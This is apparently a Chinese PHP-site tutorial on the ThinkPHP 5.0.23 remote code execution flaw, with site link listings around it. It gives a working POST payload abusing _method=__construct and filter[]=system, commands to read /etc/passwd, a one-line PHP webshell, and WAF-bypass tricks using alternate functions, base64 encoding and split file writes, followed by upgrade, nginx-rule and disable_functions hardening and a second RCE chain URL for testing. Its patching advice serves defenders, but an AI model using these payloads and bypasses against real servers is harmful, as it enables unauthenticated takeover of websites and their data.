TP5.0.23 RCE漏洞利用及修复

冬磊同学_1509

冬磊同学_1509

2026-08-23

747人浏览

原创

thinkphp 5.0.23远程代码执行漏洞属高危框架缺陷,攻击者无需认证即可通过\_method=\_\_construct与filter[]参数调用system等函数执行任意命令;需满足版本在5.0.0–5.0.23且未开启强制路由,修复方式为升级至5.0.24或配置web层拦截及禁用危险函数。

tp5.0.23 rce漏洞利用及修复

ThinkPHP 5.0.23 的远程代码执行(RCE)漏洞属于高危框架级缺陷,攻击者无需认证即可通过构造特定请求调用危险函数(如 systemexecphpinfo),直接执行任意系统命令。漏洞利用门槛低、危害大,但修复方式明确且简单。

漏洞利用的关键条件与典型POC

该漏洞生效需满足两个前提:目标使用 ThinkPHP 5.0.0–5.0.23 版本;未开启强制路由(默认关闭,因此绝大多数部署均受影响)。

核心利用链依赖对 Request 类构造函数的劫持,通过覆盖内部属性实现命令注入。最常用且稳定的有效载荷(POC)为:

  • URL路径:/index.php?s=captcha(或任意合法路由点,如 /index.php?s=index/index)
  • POST数据_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

发送后若返回类似 uid=33(www-data) gid=33(www-data) 的系统信息,即确认漏洞存在。其他常见命令可替换 id,例如 whoamils -lacat /etc/passwd 或写入 Webshell:echo '<?php @eval($_POST[cmd]);?>' > shell.php

ThinkPHP5.1企业站点快速开发-源码课件
ThinkPHP5.1企业站点快速开发-源码课件

ThinkPHP5.1企业站点快速开发

下载

绕过WAF和基础防护的常见手法

部分 WAF 或 Nginx 配置会拦截含 systemexec 等关键字的请求,但漏洞本质是属性覆盖+过滤器调用,因此可通过以下方式绕过:

  • 使用等效函数:将 filter[]=system 替换为 filter[]=passthrufilter[]=shell_execfilter[]=assert(需 PHP 配置允许)
  • 编码混淆:对命令参数 Base64 编码后再解码执行,例如:server[REQUEST_METHOD]=echo%20L2V0Yy9wYXNzd2Q=|base64%20-d
  • 分段写入:先创建空文件,再追加内容,规避单次长 payload 被截断或过滤,例如:touch x.php && echo 'xxx' >> x.php

官方修复方案与安全加固建议

ThinkPHP 官方已在 5.0.24 版本中修复该问题,核心修改包括:

  • 限制 _method 参数仅允许指定白名单方法(如 GET、POST、PUT、DELETE),禁止传入 __construct 等魔术方法
  • filter 参数增加类型校验,拒绝非字符串或非回调类型的值
  • Request::method() 中移除对未过滤 POST 参数的直接反射调用逻辑

生产环境应立即升级至 5.0.24 或更高版本。若因兼容性无法升级,可临时采取以下缓解措施:

  • 在 Web 服务器层(Nginx/Apache)添加规则,拒绝包含 _method=__constructfilter[]= 的请求
  • 禁用调试模式(app_debug = false),避免错误信息泄露路径和类结构
  • 配置 PHP 禁用危险函数:在 php.ini 中设置 disable_functions = system,exec,passthru,shell_exec,proc_open,popen,pcntl_exec

验证修复是否生效的方法

升级或加固后,必须进行有效性验证:

  • 重放原始 POC 请求,响应应为 404、500 或空白页,**绝不返回命令执行结果**
  • 尝试访问 /index.php?s=/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1(另一条经典 RCE 链),同样应失败
  • 检查日志中是否仍有大量含 _method=__construct 的异常访问记录,若有则说明前端拦截未生效

相关文章

PHP速学视频免费教程(入门到精通)
PHP速学视频免费教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载

相关标签:

thinkphp

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

相关专题

更多
AI视频生成软件推荐
AI视频生成软件推荐

本专题汇总了当前主流的AI视频生成软件推荐与排行榜单,涵盖seko、AniShort、剧云、Lovart、LiblibAI及立刻mv等热门工具。同时整理了各软件在文生视频、图生视频、时长限制、画质表现及免费额度等方面的差异对比,助您快速选对适合创作需求的AI视频生成工具。

2026.09.16

160

9

ai生成视频的工具免费版合集
ai生成视频的工具免费版合集

本专题汇总了当前免费AI生成视频工具的排行榜与推荐清单,涵盖seko、讯飞智作、AniShort及剧云、Lovart等多模型集成平台。同时整理了各工具的免费额度、输出时长、水印政策及适用场景差异,助您快速选择合适工具开启AI视频创作。

2026.09.16

60

10

Pandas时间序列分析与可视化报表
Pandas时间序列分析与可视化报表

本专题整理Pandas日期转换、时间索引、重采样、滚动窗口、时区处理、plot绘图、Styler表格样式和报表输出方法。

2026.09.16

60

23

Pandas数据筛选索引与清洗处理
Pandas数据筛选索引与清洗处理

本专题整理Pandas中的loc、iloc、条件筛选、query查询、缺失值处理、重复值删除、类型转换和字符串列清洗方法。

2026.09.16

40

25

Pandas数据读取导入与文件导出处理
Pandas数据读取导入与文件导出处理

本专题整理Pandas读取CSV、Excel、JSON、SQL、Parquet等文件的方法,以及to_csv、to_excel、to_sql和to_parquet等常用数据导出流程。

2026.09.16

40

27

GDB怎么设置断点
GDB怎么设置断点

本专题介绍GDB按照函数名、源代码行号和文件位置设置断点的方法,详细说明run、continue、next、step等命令的配合使用,帮助定位程序崩溃、逻辑异常及代码未按预期执行的问题。

2026.09.11

360

28

GDB怎么查看变量值
GDB怎么查看变量值

本专题介绍GDB调试过程中查看变量值的具体方法,涵盖局部变量、函数参数、数组、结构体和指针内容查询,同时整理变量持续显示、格式化输出及无法读取变量时的排查思路。

2026.09.11

120

22

GDB C++程序怎么调试
GDB C++程序怎么调试

本专题围绕GDB调试C++程序的实际过程,详细说明程序编译、调试器启动、命令行参数传入、断点命中和程序继续运行等步骤,并介绍条件断点、临时断点和观察点的设置方法,方便开发者跟踪复杂代码的执行状态。

2026.09.11

140

20

Iris框架MVC架构与依赖注入合集
Iris框架MVC架构与依赖注入合集

本专题讲解Iris框架MVC开发模式,包含控制器注册、方法命名与路径映射、By参数绑定、BeforeActivation自定义路由,以及依赖注入容器注册、数据库依赖注入、返回值序列化及MVC下WebSocket与gRPC整合实践。

2026.09.11

80

15

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程